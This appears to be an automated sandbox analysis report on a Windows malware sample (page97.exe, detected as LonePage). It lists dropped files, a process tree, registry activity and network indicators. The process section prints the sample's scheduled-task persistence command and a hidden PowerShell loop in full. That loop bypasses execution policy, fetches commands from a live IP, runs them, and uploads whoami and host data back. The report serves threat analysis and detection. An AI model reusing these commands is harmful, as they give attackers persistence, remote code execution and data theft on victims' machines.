C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3I127A7C4SR529WWM9TP.temp

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PF0ZRUASRPK361AXAB35.temp

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF34150.TMP (copy)

data

dropped

C:\Users\user\Desktop\dolphin.docx

Microsoft Word 2007+

dropped

C:\Users\user\Desktop\~$olphin.docx

data

dropped

There are 228 hidden files, click here to show them.

Processes

Path

Cmdline

Malicious

C:\Users\user\Desktop\page97.exe

"C:\Users\user\Desktop\page97.exe"

Details

Is windows:	false
Is dropped:	false
PID:	4012
Target ID:	0
Parent PID:	1028
Name:	page97.exe
Path:	C:\Users\user\Desktop\page97.exe
Commandline:	"C:\Users\user\Desktop\page97.exe"
Size:	38912
MD5:	64EDEB1C862FF66D9678C113B24D48BE
Time:	09:49:51
Date:	25/04/2024
Reason:	newprocess
Reputation:	low
Is admin:	true
Is elevated:	true
Modulebase:	0x380000
Modulesize:	65536
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Yara detected LonePage	Stealing of Sensitive Information, Remote Access Functionality
Machine Learning detection for sample	AV Detection
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection	System Information Discovery
Sample file is different than original file name gathered from version info	System Summary
Sigma detected: Suspicious Schtasks From Env Var Folder	System Summary
Uses 32bit PE files	Compliance, System Summary
PE file has an executable .text section and no other executable section	System Summary
Parts of this applications are using the .NET runtime (Probably coded in C#)	System Summary
Sample is known by Antivirus	System Summary
Spawns processes	System Summary	Process Injection
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a COM descriptor data directory	System Summary

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /tn OneDriveStandal0ne /tr C:\Users\Public\Libraries\OneDriveUpdate.js /sc minute /mo 20 /f

Details

Is windows:	true
Is dropped:	false
PID:	6628
Target ID:	3
Parent PID:	4012
Name:	schtasks.exe
Class:	system-tools
Path:	C:\Windows\System32\schtasks.exe
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn OneDriveStandal0ne /tr C:\Users\Public\Libraries\OneDriveUpdate.js /sc minute /mo 20 /f
Size:	235008
MD5:	76CD6626DD8834BD4A42E6A565104DC2
Time:	09:49:52
Date:	25/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff789d70000
Modulesize:	253952
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Uses schtasks.exe or at.exe to add and modify task schedules	Boot Survival	Scheduled Task/Job
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sample file is different than original file name gathered from version info	System Summary
Sigma detected: Suspicious Schtasks From Env Var Folder	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\OneDriveUpdate.js"

Details

Is windows:	true
Is dropped:	false
PID:	1360
Target ID:	5
Parent PID:	1068
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\OneDriveUpdate.js"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	09:49:54
Date:	25/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff789be0000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected LonePage	Stealing of Sensitive Information, Remote Access Functionality
Sigma detected: Script Interpreter Execution From Suspicious Folder	System Summary
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://217.12.218.107:30139/ZKcMQasOLRGSRjLa/page97/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://217.12.218.107:25928/page97',$drpy);}

Details

Is windows:	true
Is dropped:	false
PID:	7296
Target ID:	11
Parent PID:	1360
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://217.12.218.107:30139/ZKcMQasOLRGSRjLa/page97/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr\|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://217.12.218.107:25928/page97',$drpy);}
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	09:49:56
Date:	25/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7be880000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected LonePage	Stealing of Sensitive Information, Remote Access Functionality
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\dolphin.docx" /o ""

Details

Is windows:	true
Is dropped:	false
PID:	6644
Target ID:	2
Parent PID:	4012
Name:	WINWORD.EXE
Class:	word
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\dolphin.docx" /o ""
Size:	1620872
MD5:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Time:	09:49:52
Date:	25/04/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0xc50000
Modulesize:	1617920
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Allocates a big amount of memory (probably used for heap spraying)	Software Vulnerabilities	Extra Window Memory Injection
Spawns processes	System Summary	Process Injection
Starts Microsoft Word	Hooking and other Techniques for Hiding and Protection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	1472
Target ID:	4
Parent PID:	6628
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	09:49:52
Date:	25/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6d64d0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7308
Target ID:	12
Parent PID:	7296
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	09:49:56
Date:	25/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6d64d0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://217.12.218.107:3

unknown

http://217.12.218.107:30139/ZKcMQasOLRGSRjLa/page97/upgrade.txt

unknown

http://217.12.218.107:30139/ZKcMQ

unknown

http://pesterbdd.com/images/Pester.png

unknown

http://217.12.218.107:25928/page97

unknown

http://217.12.218.107:30139

unknown

http://nuget.org/NuGet.exe

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

https://go.micro

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://contoso.com/License

unknown

https://contoso.com/Icon

unknown

http://217.12.218.107:30139/zkcmqasolrgsrjla/page97/upgrade.txt

unknown

https://aka.ms/pscore68

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

http://217.12.218.108u

unknown

https://github.com/Pester/Pester

unknown

There are 8 hidden URLs, click here to show them.

Domains

Name

Malicious

bg.microsoft.map.fastly.net

199.232.210.172

IPs

Domain

Country

Malicious

217.12.218.107

unknown

Ukraine

Details

IP:	217.12.218.107
TargetID:	11
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	Ukraine
Countrycode:	UKR
ASN number:	21100
ASN name:	ITLDC-NLUA
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Connects to IPs without corresponding DNS lookups	Networking
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached

{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

LangID

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.FriendlyAppName

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.ApplicationCompany

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6644

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems

9f(

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Wizards

PageSize

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\MailSettings

Template

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

AutoRecoverySaveIntervalMetadata

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

Language

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

EcsRequestPending

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

SubscriptionCustomerLicenseInfo

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

FirstRun

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

ACUpdated

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

DefaultKerningLigatures

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\WEF

Word_RequireForceRefreshAtBoot

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems

-j(

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ReviewCycle

ReviewToken

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

FOLDERID_Desktop

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

FOLDERID_Documents

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU

FOLDERID_Desktop

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU

FOLDERID_Documents

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 21

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU

Item 1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\31BE7

31BE7

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

BuildNumber

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

Expires

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock

FileTypeBlockList

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock

OoxmlConverterBlockList

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.3

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.4

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.5

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.6

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.7

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.8

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.9

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.10

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.11

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.12

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.13

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.14

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.15

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.16

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.17

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.18

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.19

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.20

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.21

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.22

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.23

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.24

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.25

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.26

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.27

